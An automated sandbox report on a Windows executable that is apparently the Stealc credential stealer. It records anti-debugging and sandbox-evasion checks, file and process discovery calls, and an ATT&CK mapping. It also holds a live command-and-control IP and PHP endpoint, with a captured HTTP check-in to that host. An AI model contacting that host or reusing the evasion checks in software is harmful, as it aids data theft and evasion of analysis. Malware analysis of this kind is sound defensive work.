                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004F47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004EF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004F4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004F3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004EDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004EBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004EEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004EDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1160 GetSystemInfo,ExitProcess,0_2_004E1160
                Source: file.exe, file.exe, 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1845108606.00000000014B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware^a
                Source: file.exe, 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36207
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36204
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36259
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36224
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36219
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36093
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E4610 VirtualProtect ?,00000004,00000100,000000000_2_004E4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004F9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9AA0 mov eax, dword ptr fs:[00000030h]0_2_004F9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_004F7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004F9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004F98E0
                Source: file.exe, file.exe, 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: lProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00527588 cpuid 0_2_00527588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_004F7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_004F7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_004F79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_004F7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1803312962.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7140, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php1file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpQfile.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/Bfile.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206file.exe, 00000000.00000002.1845108606.000000000143E000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.php)file.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.phpIfile.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/6c4adf523b719729.phpufile.exe, 00000000.00000002.1845108606.0000000001483000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/Gfile.exe, 00000000.00000002.1845108606.0000000001496000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1803312962.000000000514B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1544500
                                      Start date and time:2024-10-29 14:10:07 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 30s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:1
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 123
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                      • 185.215.113.206/6c4adf523b719729.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/6c4adf523b719729.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousLummaCBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.955565837224271
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:2'113'024 bytes
                                      MD5:ab7d9340bee9cb1f62845fcaea9476cb
                                      SHA1:aadac5ac21e4e0160dca5ac67727ab5bb436b63b
                                      SHA256:390a2c58405e383d833df9f7bc6c5abcfa292b73e8297ccfe05c043b084ff29b
                                      SHA512:facbbfb7823915deeb271078f909338d514774ee8d12f3aa04b581a5263d010cc58775ad852cbb86b8c0368cb221fcf152353e4df7af113f5d73f6057fcaf822
                                      SSDEEP:49152:pPnNEg544+TK8I1HoTdYO7fj3rX26BfWRU1CwSFBKOBXBz2Jtjeu:pvJa4e2oTeKjrBfWdwoKOBRzKQu
                                      TLSH:C5A5339F1817FB66E9358B7DC69BCBC80791338293FC57F88A5B58329200909B792C5D
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0xb19000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007F9FD0C0535Ah
                                      hint_nop dword ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [edx], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ebx], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, byte ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edx], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      push es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, byte ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      sbb al, 00h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x2e70000x67600e4bd6153f24730c4ae14c294c4f5bb35unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x2ea0000x2950000x200e5b352016fdd15d42b786d7215b96351unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      dlatbedx0x57f0000x1990000x198c00f8d848c83d09261cd7021f1d36598509False0.994636372324159data7.952200303038952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      ncjyujoo0x7180000x10000x6009bf9cf7dc257c3a6894ff8241c0d99f4False0.5520833333333334data4.914453457263019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x7190000x30000x2200ede9711f96dc41c337884a01f467827cFalse0.05307904411764706DOS executable (COM)0.5967975301874965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-29T14:11:19.442782+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449735185.215.113.20680TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 29, 2024 14:11:18.251501083 CET4973580192.168.2.4185.215.113.206
                                      Oct 29, 2024 14:11:18.257097960 CET8049735185.215.113.206192.168.2.4
                                      Oct 29, 2024 14:11:18.257257938 CET4973580192.168.2.4185.215.113.206
                                      Oct 29, 2024 14:11:18.260381937 CET4973580192.168.2.4185.215.113.206
                                      Oct 29, 2024 14:11:18.265788078 CET8049735185.215.113.206192.168.2.4
                                      Oct 29, 2024 14:11:19.158421040 CET8049735185.215.113.206192.168.2.4
                                      Oct 29, 2024 14:11:19.158534050 CET4973580192.168.2.4185.215.113.206
                                      Oct 29, 2024 14:11:19.162049055 CET4973580192.168.2.4185.215.113.206
                                      Oct 29, 2024 14:11:19.167618990 CET8049735185.215.113.206192.168.2.4
                                      Oct 29, 2024 14:11:19.442651987 CET8049735185.215.113.206192.168.2.4
                                      Oct 29, 2024 14:11:19.442781925 CET4973580192.168.2.4185.215.113.206
                                      Oct 29, 2024 14:11:22.239335060 CET4973580192.168.2.4185.215.113.206

                                      HTTP Request Dependency Graph

                                      • 185.215.113.206

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449735185.215.113.206807140C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 29, 2024 14:11:18.260381937 CET90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 29, 2024 14:11:19.158421040 CET203INHTTP/1.1 200 OK
                                      Date: Tue, 29 Oct 2024 13:11:19 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Content-Length: 0
